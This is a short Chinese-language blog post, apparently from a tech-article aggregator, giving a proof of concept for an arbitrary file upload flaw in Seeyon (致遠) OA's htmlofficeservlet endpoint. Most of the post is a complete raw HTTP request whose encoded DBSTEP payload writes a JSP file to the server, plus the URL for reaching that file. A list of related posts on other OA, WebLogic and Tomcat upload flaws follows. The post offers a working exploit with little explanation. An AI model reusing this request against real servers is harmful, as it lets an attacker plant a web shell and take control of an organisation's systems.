2. 程式人生 > 實用技巧 >seeyou 致遠OA 任意檔案上傳

seeyou 致遠OA 任意檔案上傳

阿新 發佈:2020-12-20

訪問:http://xxxx/seeyon/htmlofficeservlet,看到

POC:

POST /seeyon/htmlofficeservlet HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=531FF04E580BC32CDCE288A8A9E33548;
Connection: close
Content-Length: 493

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<% out.println("<h1>Hello World!</h1>");%>6e4f045d4b8506bf492ada7e3390d7ce

訪問:http://xxx/seeyon/test123456.jsp

相關推薦

seeyou OA 任意檔案

訪問:http://xxxx/seeyon/htmlofficeservlet,看到 POC: POST /seeyon/htmlofficeservlet HTTP/1.1 Host: x.x.x.x

通達OA任意檔案+檔案包含RCE漏洞復現(附自寫EXP)

一、環境搭建: 下載通達OA的安裝包,根據提示點選下一步安裝即可,安裝完成,訪問本機ip即可

OA-ajax.do任意檔案漏洞復現

致遠OA-ajax.do任意檔案上傳漏洞復現: 漏洞出現原因: 致遠OA舊版本中某些介面存在未授權訪問,以及部分函式過濾不足,攻擊者通過構造惡意請求,可在無需登入的情況下上傳惡意指令碼,從而控制伺服器

Django實現任意檔案(最簡單的方法)

利用Django實現檔案並且儲存到指定路徑下,其實並不困難,完全不需要用到django的forms,也不需要django的models,就可以實現,下面開始實現。

Tomcat 任意檔案漏洞(CVE-2017-12615)

0x01簡介 2017年9月19日,Apache Tomcat官方確認並修復了兩個高危漏洞,漏洞CVE編號:CVE-2017-12615和CVE-2017-12616,其中 遠端程式碼執行漏洞(CVE-2017-12615) 影響: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修復不

漏洞復現——weblogic任意檔案(cve-2018-2894)

0X01漏洞簡介: Weblogic管理端未授權的兩個頁面存在任意jsp檔案漏洞,進而獲取伺服器許可權。

wordpress外掛wpdiscuz任意檔案漏洞分析

下載連結 https://downloads.wordpress.org/plugin/wpdiscuz.7.0.3.zip 測試 環境 windows phpstudy phpstorm

(CVE-2018-2894)Weblogic任意檔案漏洞復現

漏洞說明 Oracle 7月更新中,修復了Weblogic Web Service Test Page中一處任意檔案漏洞,Weblogic管理端未授權的兩個頁面存在任意jsp檔案漏洞,進而獲取伺服器許可權。

phpcmsv9.0任意檔案漏洞解析

漏洞存在地址: burp抓包 POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1

WEB安全第二篇--用檔案搞定伺服器:任意檔案檔案包含與任意目錄檔案遍歷

最近做專心web安全有一段時間了,但是目測後面的活會有些複雜,涉及到更多的中介軟體、底層安全、漏洞研究與安全建設等越來越複雜的東東,所以在這裡想寫一個系列關於web安全基礎以及一些討巧的payload技巧以便於備

任意檔案漏洞

一、介紹 原因是伺服器配置不當或者沒有進行足夠的過濾,使用者可以任意檔案,包括惡意指令碼檔案、exe程式等,這就造成了檔案漏洞。

A8任意檔案寫入+getshell(CNVD-2019-19299)

影響版本:A8-V5協同管理軟體V6.1sp1 A8+協同管理軟體V7.0、V7.0sp1、V7.0sp2、V7.0sp3

CVE-2018-2894 Weblogic 任意檔案漏洞

0X00-引言 甲方就是上帝,唯甲方主義,淦 0X01-環境搭建 靶機:CentOS Linux 7 攻擊機:windows server 2016 && Kail

E-Office v9 任意檔案 (新)

E-Office v9 任意檔案 E-Office v9 任意檔案 (新) Poc POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1

通達OA11.6任意檔案刪除+檔案組合GetShell

通達OA11.6任意檔案刪除+檔案上傳組合GetShell 漏洞介紹 通達OA(Office Anywhere網路智慧辦公系統)是由北京通達信科科技有限公司自主研發的協同辦公自動化軟體,是與中國企業管理實踐相結合形成的綜合管理辦公平臺

Apache Flink 任意jar檔案+執行

01 描述 通過部署任意jar包的功能可直接向伺服器新增jar木馬檔案 02 影響範圍 <= 1.9.1

javaWeb學習總結——檔案、下載

嘿,熊dei,你不得不知道在Web開發中,檔案上傳和下載功能是非常常用的功能,關於檔案上傳,瀏覽器上傳檔案以流的形式傳輸】——>伺服器端——>Servlet獲取上傳檔案的輸入流——>解析請求引數,這一系列過

Go檔案下載

Go自帶很多包,本例使用io包和net包相應的API簡單實現基於http的檔案下載(僅為demo)

Live-Server-8-SpringBoot檔案下載

伺服器中的檔案上傳下載是基本操作,圖片、使用者頭像的上傳下載、檔案的傳輸和資源分享等已經成為每個應用必不可少的功能。在我的認知中,伺服器的檔案儲存下載簡單流程是這樣的:上傳檔案->在資料庫中記錄該檔案

java實現檔案、下載、圖片預覽

這篇文章主要介紹了java實現檔案、下載、圖片預覽,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下